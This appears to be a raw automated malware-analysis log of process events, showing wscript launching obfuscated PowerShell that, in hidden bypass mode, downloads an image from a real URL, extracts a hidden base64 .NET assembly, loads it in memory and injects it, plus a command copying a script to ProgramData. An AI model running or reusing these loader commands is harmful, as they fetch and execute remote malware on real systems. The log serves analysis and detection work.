        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mq? ? ? ? ?w? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bl? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bo? ? ? ? ?g4? ? ? ? ?bwb0? ? ? ? ?gu? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?v? ? ? ? ?gq? ? ? ? ?zqbh? ? ? ? ?hq? ? ? ? ?a? ? ? ? ?bu? ? ? ? ?g8? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?c4? ? ? ? ?agbw? ? ? ? ?gc? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?tgbl? ? ? ? ?hc? ? ? ? ?lqbp? ? ? ? ?gi? ? ? ? ?agbl? ? ? ? ?gm? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?tgbl? ? ? ? ?hq? ? ? ? ?lgbx? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c4? ? ? ? ?r? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?eq? ? ? ? ?yqb0? ? ? ? ?ge? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbv? ? ? ? ?hi? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bb? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eu? ? ? ? ?bgbj? ? ? ? ?g8? ? ? ? ?z? ? ? ? ?bp? ? ? ? ?g4? ? ? ? ?zwbd? ? ? ? ?do? ? ? ? ?ogbv? ? ? ? ?fq? ? ? ? ?rg? ? ? ? ?4? ? ? ? ?c4? ? ? ? ?rwbl? ? ? ? ?hq? ? ? ? ?uwb0? ? ? ? ?hi? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?cwb0? ? ? ? ?ge? ? ? ? ?cgb0? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb? ? ? ? ?fm? ? ? ? ?rq? ? ? ? ?2? ? ? ? ?dq? ? ? ? ?xwbt? ? ? ? ?fq? ? ? ? ?qqbs? ? ? ? ?fq? ? ? ? ?pg? ? ? ? ?+? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gu? ? ? ? ?bgbk? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb?
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'c:\programdata\' , 'neuromo','addinprocess32','desativado'))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mq? ? ? ? ?w? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bl? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bo? ? ? ? ?g4? ? ? ? ?bwb0? ? ? ? ?gu? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?v? ? ? ? ?gq? ? ? ? ?zqbh? ? ? ? ?hq? ? ? ? ?a? ? ? ? ?bu? ? ? ? ?g8? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?c4? ? ? ? ?agbw? ? ? ? ?gc? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?tgbl? ? ? ? ?hc? ? ? ? ?lqbp? ? ? ? ?gi? ? ? ? ?agbl? ? ? ? ?gm? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?tgbl? ? ? ? ?hq? ? ? ? ?lgbx? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c4? ? ? ? ?r? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?eq? ? ? ? ?yqb0? ? ? ? ?ge? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbv? ? ? ? ?hi? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bb? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eu? ? ? ? ?bgbj? ? ? ? ?g8? ? ? ? ?z? ? ? ? ?bp? ? ? ? ?g4? ? ? ? ?zwbd? ? ? ? ?do? ? ? ? ?ogbv? ? ? ? ?fq? ? ? ? ?rg? ? ? ? ?4? ? ? ? ?c4? ? ? ? ?rwbl? ? ? ? ?hq? ? ? ? ?uwb0? ? ? ? ?hi? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?cwb0? ? ? ? ?ge? ? ? ? ?cgb0? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb? ? ? ? ?fm? ? ? ? ?rq? ? ? ? ?2? ? ? ? ?dq? ? ? ? ?xwbt? ? ? ? ?fq? ? ? ? ?qqbs? ? ? ? ?fq? ? ? ? ?pg? ? ? ? ?+? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gu? ? ? ? ?bgbk? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb? Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'c:\programdata\' , 'neuromo','addinprocess32','desativado'))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
